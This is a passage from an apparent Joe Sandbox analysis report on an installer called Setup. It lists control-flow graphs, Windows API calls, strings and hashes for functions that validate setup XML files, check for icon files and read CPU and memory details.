6c4a6cc1-6c4a6cc3 682->686 687 6c4a6cc7-6c4a6cff VariantClear 682->687 686->687 693 6c4a6d06-6c4a6d19 687->693 698 6c4a6db8-6c4a6dc1 693->698 699 6c4a6d1f-6c4a6db0 call 6c49e8e8 call 6c4a80ba call 6c4a8460 call 6c49e8e8 call 6c48ca39 693->699 702 6c4a6dc9-6c4a6ddd call 6c4a8460 698->702 703 6c4a6dc3-6c4a6dc5 698->703 699->698 710 6c4a6ddf-6c4a6de1 702->710 711 6c4a6de5-6c4a6de9 VariantClear 702->711 703->702 710->711 711->642
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A6981
                                                                • Part of subcall function 6C491E75: __EH_prolog3.LIBCMT ref: 6C491E7C
                                                                • Part of subcall function 6C491E75: GetThreadLocale.KERNEL32(?,00000004,6C496734,LBqIl,0000004C,6C497142,?,00000000), ref: 6C491E8E
                                                              • CoCreateInstance.OLE32(6C487980,00000000,00000017,6C487970,?,?,00000068,6C4A65A6,?,?,?,?,6C4A2A30,?,00000000,?), ref: 6C4A69AC
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 6C4A6A7F
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271), ref: 6C4A6A8C
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C4A6ABE
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271), ref: 6C4A6AC1
                                                              • CoCreateInstance.OLE32(6C487990,00000000,00000017,6C4879A0,?), ref: 6C4A6B4C
                                                                • Part of subcall function 6C48C98C: GetThreadLocale.KERNEL32 ref: 6C48C999
                                                                • Part of subcall function 6C48B93E: __EH_prolog3.LIBCMT ref: 6C48B945
                                                                • Part of subcall function 6C49F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6C48C3AE), ref: 6C49F241
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6BBD
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • PathIsRelativeW.SHLWAPI(?,?), ref: 6C4A6BE8
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C4A6BF5
                                                              • PathFileExistsW.SHLWAPI(?,?), ref: 6C4A6C27
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C4A6C2A
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6C8E
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4A6CAB
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6CED
                                                              • VariantClear.OLEAUT32(?), ref: 6C4A6DE9
                                                                • Part of subcall function 6C48CA39: __EH_prolog3.LIBCMT ref: 6C48CA40
                                                              Strings
                                                              • Loading file - %s, xrefs: 6C4A6AF3
                                                              • Validation FAILED Reason:%s, xrefs: 6C4A6D5F
                                                              • CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s), xrefs: 6C4A69DC
                                                              • UiInfo.xml, xrefs: 6C4A6A65
                                                              • Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s, xrefs: 6C4A6E8B
                                                              • Stopping XML schema validation of UI information and continuing, xrefs: 6C4A69FA, 6C4A6B9A
                                                              • http://schemas.microsoft.com/SetupUI/2008/01/imui, xrefs: 6C4A6C7A
                                                              • UIInfo.xml, xrefs: 6C4A6D8C, 6C4A6EC3
                                                              • CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s), xrefs: 6C4A6B7C
                                                              • Add to schema collection schema file - %s, xrefs: 6C4A6C4D
                                                              • SetupUi.xsd, xrefs: 6C4A6BD7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExistsFile$H_prolog3$ClearVariant$CreateInstanceLocaleRelativeThread$AppendException@8Throw
                                                              • String ID: Validation FAILED Reason:%s$Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s$Add to schema collection schema file - %s$CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s)$CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s)$Loading file - %s$SetupUi.xsd$Stopping XML schema validation of UI information and continuing$UIInfo.xml$UiInfo.xml$http://schemas.microsoft.com/SetupUI/2008/01/imui
                                                              • API String ID: 3881019808-2332759018
                                                              • Opcode ID: 69ecc907020794ca5640540e39ff77974d8de59f2003a435c62e580541a7d8d8
                                                              • Instruction ID: 079e9f07e68add72fdc127d492efce9777c047e864496ce3de802121243822b2
                                                              • Opcode Fuzzy Hash: 69ecc907020794ca5640540e39ff77974d8de59f2003a435c62e580541a7d8d8
                                                              • Instruction Fuzzy Hash: 17024871D01249EFDF00DBE8C988EDDBBB8AF19308F244599E510BB755D7319A0ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C492B11 Relevance: 38.9, APIs: 11, Strings: 11, Instructions: 447COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 724 6c492b11-6c492ba8 call 6c4b265b call 6c49e8e8 call 6c48d65f call 6c4a8460 call 6c49e8e8 call 6c48d65f call 6c48d76f call 6c49e8e8 call 6c4a8460 743 6c492baa-6c492bac 724->743 744 6c492bb0-6c492c18 call 6c4a8460 call 6c49e8e8 call 6c48d65f call 6c48d76f call 6c49e8e8 call 6c4a8460 724->744 743->744 757 6c492c1a-6c492c1c 744->757 758 6c492c20-6c492c9b call 6c4a8460 call 6c49e8e8 call 6c48d65f call 6c4a8460 call 6c49e8e8 call 6c48d6c4 call 6c48d76f 744->758 757->758 773 6c492c9d-6c492c9f 758->773 774 6c492ca3-6c492cde call 6c4a8460 758->774 773->774 777 6c492ce1-6c492d22 call 6c49e8e8 call 6c48d6c4 call 6c48d76f 774->777 784 6c492d2a-6c492d46 call 6c4a8460 call 6c4a8199 777->784 785 6c492d24-6c492d26 777->785 790 6c492d48 784->790 791 6c492d4b-6c492d86 call 6c49e8e8 call 6c49f5fd call 6c4a8460 * 2 784->791 785->784 790->791 791->777 800 6c492d8c-6c492da4 call 6c491e75 PathIsRelativeW 791->800 803 6c492dbb-6c492df4 call 6c4a83fd call 6c49f21d * 2 PathFileExistsW 800->803 804 6c492da6-6c492db6 PathFileExistsW 800->804 831 6c492e0e-6c492e13 PathFileExistsW 803->831 832 6c492df6-6c492e0b call 6c49ea8d call 6c49f21d 803->832 805 6c492e5a-6c492e5c 804->805 808 6c492e2c-6c492e37 PathIsRelativeW 805->808 809 6c492e5e-6c492ebb call 6c48c9bb call 6c48cb96 call 6c4a8460 call 6c48d1b4 call 6c4adbdb 805->809 810 6c492e3d-6c492e47 PathFileExistsW 808->810 811 6c492ec0-6c492ef3 call 6c4a83fd call 6c49f21d * 2 PathFileExistsW 808->811 809->811 814 6c492f92-6c492f94 810->814 852 6c492f0d-6c492f12 PathFileExistsW 811->852 853 6c492ef5-6c492f0a call 6c49ea8d call 6c49f21d 811->853 818 6c492f27-6c492f71 call 6c4a83fd * 2 814->818 819 6c492f96-6c492fef call 6c48c9bb call 6c48cb96 call 6c4a8460 call 6c48d1b4 814->819 850 6c493028-6c49305a call 6c4a8460 * 2 call 6c49f5a3 call 6c4a8460 818->850 851 6c492f77-6c492f82 818->851 887 6c492ff7-6c492ffa 819->887 834 6c492e4c-6c492e58 call 6c4a8460 831->834 835 6c492e15-6c492e27 call 6c49ea8d call 6c4a8460 831->835 832->831 834->805 835->808 891 6c49305c-6c49305e 850->891 892 6c493062-6c493081 call 6c4a8460 * 2 850->892 861 6c492ffc-6c492fff 851->861 857 6c492f84-6c492f90 call 6c4a8460 852->857 858 6c492f14-6c492f22 call 6c49ea8d call 6c4a8460 852->858 853->852 857->814 858->818 864 6c493093-6c4930ab RaiseException 861->864 865 6c493005-6c49300b 861->865 865->864 873 6c493011-6c493026 call 6c49f5fd 865->873 873->850 873->887 887->861 891->892 897 6c493089-6c493090 call 6c4b2709 892->897 898 6c493083-6c493085 892->898 898->897
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C492B1B
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C48D76F: __EH_prolog3.LIBCMT ref: 6C48D776
                                                                • Part of subcall function 6C48D76F: SysFreeString.OLEAUT32(00000000), ref: 6C48D7CA
                                                              • PathIsRelativeW.SHLWAPI(?,00000001,?,000000FF,?,?,?,?,00000001,?,?,?,000000FF,00000088,6C4A6F88,?), ref: 6C492D9C
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492DAF
                                                              • PathFileExistsW.SHLWAPI(00000005,?,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C492DF0
                                                              • PathFileExistsW.SHLWAPI(00000005,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492E0F
                                                              • PathIsRelativeW.SHLWAPI(00000001,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492E2F
                                                              • PathFileExistsW.SHLWAPI(00000001,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492E40
                                                              • __CxxThrowException@8.LIBCMT ref: 6C492EBB
                                                              • PathFileExistsW.SHLWAPI(00000005,00000001,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C492EEF
                                                                • Part of subcall function 6C49F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6C48C3AE), ref: 6C49F241
                                                              • PathFileExistsW.SHLWAPI(00000005,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C492F0E
                                                                • Part of subcall function 6C4A83ED: _memcpy_s.LIBCMT ref: 6C4A844E
                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 6C49309C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExistsFile$H_prolog3$Relative$AppendExceptionException@8FreeRaiseStringThrow_memcpy_s
                                                              • String ID: %$Caption$CreateLayout$Default$HeaderImage$Install$Repair$Uninstall$UninstallPatch$Watermark$WizardImages
                                                              • API String ID: 2164894574-1575104729
                                                              • Opcode ID: e192402bd9b49cab3ffbfcc4e5e32becc5168c03244b515d051b79b1fcfea4cf
                                                              • Instruction ID: 0f49262634d7eb982509b3c1901291f48b38ad72879d412db8a43e196f0d8518
                                                              • Opcode Fuzzy Hash: e192402bd9b49cab3ffbfcc4e5e32becc5168c03244b515d051b79b1fcfea4cf
                                                              • Instruction Fuzzy Hash: 97122B7190125DEFDF00DBE8C984EDDBBB8AF05318F148159E424AB795DB34DA0ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9509E3 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 228registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 901 6c9509e3-6c950a25 call 6c976e8d call 6c915727 907 6c950a27-6c950a2f GetLastError 901->907 908 6c950a3f 901->908 909 6c950a31-6c950a36 907->909 910 6c950a3b-6c950a3d 907->910 911 6c950a41-6c950a80 call 6c94833e call 6c951236 call 6c968f0e 908->911 909->910 910->911 919 6c950a82-6c950a8a GetLastError 911->919 920 6c950a9a 911->920 921 6c950a96-6c950a98 919->921 922 6c950a8c-6c950a91 919->922 923 6c950a9c-6c950ae9 call 6c94833e call 6c951236 call 6c968f0e RegOpenKeyExW 920->923 921->923 922->921 930 6c950bc2-6c950bd9 call 6c96e770 923->930 931 6c950aef-6c950b14 RegQueryValueExW 923->931 939 6c950bdc-6c950be1 930->939 932 6c950b16-6c950b34 RegQueryValueExW 931->932 933 6c950b52-6c950b5f RegCloseKey 931->933 932->933 936 6c950b36-6c950b4f RegQueryValueExW 932->936 937 6c950b61-6c950b73 933->937 938 6c950bc0 933->938 936->933 942 6c950b75-6c950b7d GetLastError 937->942 943 6c950b8d 937->943 938->930 939->939 941 6c950be3-6c950bf2 GlobalMemoryStatusEx 939->941 944 6c950bf4-6c950c13 941->944 945 6c950c4f-6c950c74 call 6c94833e GetLastError call 6c951236 941->945 946 6c950b7f-6c950b84 942->946 947 6c950b89-6c950b8b 942->947 948 6c950b8f-6c950bbf call 6c94833e call 6c951236 call 6c968f0e 943->948 954 6c950c15-6c950c1d GetLastError 944->954 955 6c950c2b-6c950c4d call 6c94833e call 6c951236 944->955 962 6c950c77-6c950c8b call 6c968f0e call 6c953439 call 6c976f1f 945->962 946->947 947->948 948->938 958 6c950c1f-6c950c24 954->958 959 6c950c29 954->959 955->962 958->959 959->955
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C9509ED
                                                                • Part of subcall function 6C915727: GetModuleHandleW.KERNEL32(kernel32.dll,?,6C915782,00000000,6C94831D), ref: 6C915731
                                                                • Part of subcall function 6C915727: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C915741
                                                              • GetLastError.KERNEL32 ref: 6C950A27
                                                              • GetLastError.KERNEL32 ref: 6C950A82
                                                              • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,?,00000000,?,Failed to record NumberOfProcessor), ref: 6C950ADE
                                                              • RegQueryValueExW.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 6C950B0D
                                                              • RegQueryValueExW.ADVAPI32(?,~Mhz,00000000,00000000,?,?), ref: 6C950B2D
                                                              • RegQueryValueExW.ADVAPI32(?,~mhz,00000000,00000000,?,?), ref: 6C950B4D
                                                              • RegCloseKey.KERNEL32(?), ref: 6C950B55
                                                              • GetLastError.KERNEL32 ref: 6C950B75
                                                              • _memset.LIBCMT ref: 6C950BCC
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,6C90A738,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C950BEA
                                                              • GetLastError.KERNEL32(?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C950C15
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetLastError.KERNEL32(?,GlobalMemoryStatusEx failed,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C950C60
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$QueryValue$H_prolog3$AddressCloseGlobalH_prolog3_HandleMemoryModuleOpenProcStatus_memset
                                                              • String ID: Failed to record CpuArchitecture$Failed to record NumberOfProcessor$Failed to record SystemMemory$GlobalMemoryStatusEx failed$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz$~Mhz$~mhz
                                                              • API String ID: 2659457873-2309824155
                                                              • Opcode ID: e3b0630a628c47e69b2a5dba51f56524d402ce832c12923414f5be25ddcd1ace
                                                              • Instruction ID: a9ef59031666c67212383f5e8f5374837bd1a53030b719f7bf0059d93390e8dd
                                                              • Opcode Fuzzy Hash: e3b0630a628c47e69b2a5dba51f56524d402ce832c12923414f5be25ddcd1ace
                                                              • Instruction Fuzzy Hash: 25818B71A00249ABDB20CFE4CC45FDEBBB9AF55358F204629E115EB690D730DA15CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95D01E Relevance: 35.1, APIs: 3, Strings: 17, Instructions: 92COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95D025
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • PathFileExistsW.SHLWAPI(?,6C9061FC,graphics,?,00000054,6C95B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C95D0BE
                                                              • __CxxThrowException@8.LIBCMT ref: 6C95D16E
                                                                • Part of subcall function 6C948F73: PathRemoveFileSpecW.SHLWAPI(00000000,2806C750,00000010,80004005,6C915DB8,6C94F845,00000010,?,6C94831D,00000000), ref: 6C948F84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FilePath$H_prolog3$AppendException@8ExistsModuleNameRemoveSpecThrow
                                                              • String ID: Graphic file %s does not exists$Print.ico$Rotate1.ico$Rotate2.ico$Rotate3.ico$Rotate4.ico$Rotate5.ico$Rotate6.ico$Rotate7.ico$Rotate8.ico$Save.ico$Setup.ico$SysReqMet.ico$SysReqNotMet.ico$graphics$stop.ico$warn.ico
                                                              • API String ID: 419085990-1965610755
                                                              • Opcode ID: 66c74831d878da533e0a1741a8ee8248ffabdd969db1dbb8d3853d11964c0ca9
                                                              • Instruction ID: 83cfe4ec047d326aa8939f92f0ac07b38ae11ea5b70e3f2150cafa35f1c0631e
                                                              • Opcode Fuzzy Hash: 66c74831d878da533e0a1741a8ee8248ffabdd969db1dbb8d3853d11964c0ca9
                                                              • Instruction Fuzzy Hash: 6D4125B2A00259DBCB10DFE8C946BDEBBB5BF25304F504459E814FBA50C730DA89CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C92A82C Relevance: 33.9, APIs: 2, Strings: 17, Instructions: 638COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1008 6c92a82c-6c92a854 call 6c976e1a 1011 6c92a856-6c92a858 1008->1011 1012 6c92a85c-6c92a87c call 6c926249 1008->1012 1011->1012 1015 6c92a884-6c92a8a8 call 6c926440 1012->1015 1016 6c92a87e-6c92a880 1012->1016 1019 6c92a8b0-6c92a8e4 call 6c9269b7 call 6c94833e 1015->1019 1020 6c92a8aa-6c92a8ac 1015->1020 1016->1015 1025 6c92a8e6-6c92a8e8 1019->1025 1026 6c92a8ec-6c92a90c call 6c918d44 call 6c921c2e 1019->1026 1020->1019 1025->1026 1031 6c92a914-6c92a94a call 6c968f0e call 6c94833e 1026->1031 1032 6c92a90e-6c92a910 1026->1032 1037 6c92a952-6c92a972 call 6c918d44 call 6c921d3d 1031->1037 1038 6c92a94c-6c92a94e 1031->1038 1032->1031 1043 6c92a974-6c92a976 1037->1043 1044 6c92a97a-6c92a9b0 call 6c968f0e call 6c94833e 1037->1044 1038->1037 1043->1044 1049 6c92a9b2-6c92a9b4 1044->1049 1050 6c92a9b8-6c92a9de call 6c918d44 call 6c92784c 1044->1050 1049->1050 1055 6c92a9e0-6c92a9e2 1050->1055 1056 6c92a9e6-6c92aa1b call 6c968f0e call 6c94833e 1050->1056 1055->1056 1061 6c92aa23-6c92aa48 call 6c919411 call 6c923ba9 1056->1061 1062 6c92aa1d-6c92aa1f 1056->1062 1067 6c92aa50-6c92aa72 call 6c968f0e 1061->1067 1068 6c92aa4a-6c92aa4c 1061->1068 1062->1061 1071 6c92aa74-6c92aa76 1067->1071 1072 6c92aa7a-6c92aa99 call 6c926d1f 1067->1072 1068->1067 1071->1072 1075 6c92aaa1-6c92aac3 call 6c926e28 1072->1075 1076 6c92aa9b-6c92aa9d 1072->1076 1079 6c92aac5-6c92aac7 1075->1079 1080 6c92aacb-6c92ab73 call 6c9270c5 call 6c9297ce call 6c94833e 1075->1080 1076->1075 1079->1080 1087 6c92ab75-6c92ab77 1080->1087 1088 6c92ab7b-6c92abc1 call 6c9195c1 call 6c968f0e call 6c94833e 1080->1088 1087->1088 1095 6c92abc3-6c92abc5 1088->1095 1096 6c92abc9-6c92ac09 call 6c919703 call 6c968f0e call 6c94833e 1088->1096 1095->1096 1103 6c92ac11-6c92ac54 call 6c919703 call 6c968f0e call 6c94833e 1096->1103 1104 6c92ac0b-6c92ac0d 1096->1104 1111 6c92ac56-6c92ac58 1103->1111 1112 6c92ac5c-6c92ac86 call 6c919703 call 6c968f0e 1103->1112 1104->1103 1111->1112 1117 6c92ac88-6c92ac8a 1112->1117 1118 6c92ac8e-6c92aca9 call 6c9189b7 1112->1118 1117->1118 1121 6c92acb1-6c92acbc call 6c91922c 1118->1121 1122 6c92acab-6c92acad 1118->1122 1125 6c92ad22-6c92ad46 call 6c94833e 1121->1125 1126 6c92acbe-6c92ad0f call 6c94833e * 2 call 6c91838a call 6c968f0e * 2 call 6c91a378 1121->1126 1122->1121 1131 6c92ad48-6c92ad4a 1125->1131 1132 6c92ad4e-6c92ad93 call 6c919703 call 6c94833e call 6c91a2b5 call 6c968f0e * 2 1125->1132 1151 6c92ad14-6c92ad1d call 6c9714aa 1126->1151 1131->1132 1154 6c92ae06-6c92ae33 call 6c94833e 1132->1154 1155 6c92ad95-6c92ada9 call 6c932d50 1132->1155 1151->1125 1162 6c92ae35-6c92ae37 1154->1162 1163 6c92ae3b call 6c9190aa 1154->1163 1160 6c92adab-6c92adb3 1155->1160 1161 6c92adbd 1155->1161 1164 6c92adb5-6c92adb7 1160->1164 1165 6c92adb9-6c92adbb 1160->1165 1166 6c92adbf-6c92adcc call 6c968f0e 1161->1166 1162->1163 1169 6c92ae40-6c92ae42 1163->1169 1164->1161 1164->1165 1165->1166 1166->1154 1173 6c92adce-6c92ae01 call 6c94833e * 2 call 6c91838a 1166->1173 1171 6c92ae44-6c92ae74 call 6c94833e 1169->1171 1172 6c92ae89 1169->1172 1181 6c92ae76-6c92ae78 1171->1181 1182 6c92ae7c-6c92ae83 call 6c9190aa 1171->1182 1175 6c92ae8b-6c92ae8f 1172->1175 1173->1151 1178 6c92aea0-6c92aeab 1175->1178 1179 6c92ae91-6c92ae9b call 6c968f0e 1175->1179 1184 6c92aeb8-6c92aeba 1178->1184 1185 6c92aead-6c92aeb3 call 6c968f0e 1178->1185 1179->1178 1181->1182 1182->1172 1199 6c92ae85-6c92ae87 1182->1199 1187 6c92af22-6c92af2b 1184->1187 1188 6c92aebc-6c92aefa call 6c94833e * 2 call 6c91838a call 6c968f0e 1184->1188 1185->1184 1191 6c92af71-6c92af7a 1187->1191 1192 6c92af2d-6c92af6f call 6c94833e * 2 call 6c91838a call 6c968f0e 1187->1192 1218 6c92aefe-6c92af1a call 6c968f0e call 6c91a378 1188->1218 1200 6c92af82-6c92af89 call 6c976f06 1191->1200 1201 6c92af7c-6c92af7e 1191->1201 1192->1218 1199->1175 1201->1200 1218->1187
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92A833
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92AD1D
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: <$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$IsPresent$MSIOptions$MSIRepairOptions$MSIUninstallOptions$ParameterInfo.xml$ProductCode$RepairOverride$UninstallOverride$schema validation failure: MSI, AgileMSI and AgileMSP do not support RepairOverride or UninstallOverride child elements!$schema validation failure: Product Code cannot be emoty.$schema validation failure: wrong number of MSI child nodes!
                                                              • API String ID: 2489616738-1903366528
                                                              • Opcode ID: d68872f05106b5a561814dbad5713a9a15e81ee0a7a4b6c08587795fbc279a7e
                                                              • Instruction ID: 8c4865a1099b6800323b64b352f2763e2403bf18dcf6549dc2d11c418ba44369
                                                              • Opcode Fuzzy Hash: d68872f05106b5a561814dbad5713a9a15e81ee0a7a4b6c08587795fbc279a7e
                                                              • Instruction Fuzzy Hash: B1428471A14249EFDB04CFA8C944ADE7BB9BF19318F148549F864EBB80CB34DA05CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C932582 Relevance: 32.0, APIs: 2, Strings: 16, Instructions: 464COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
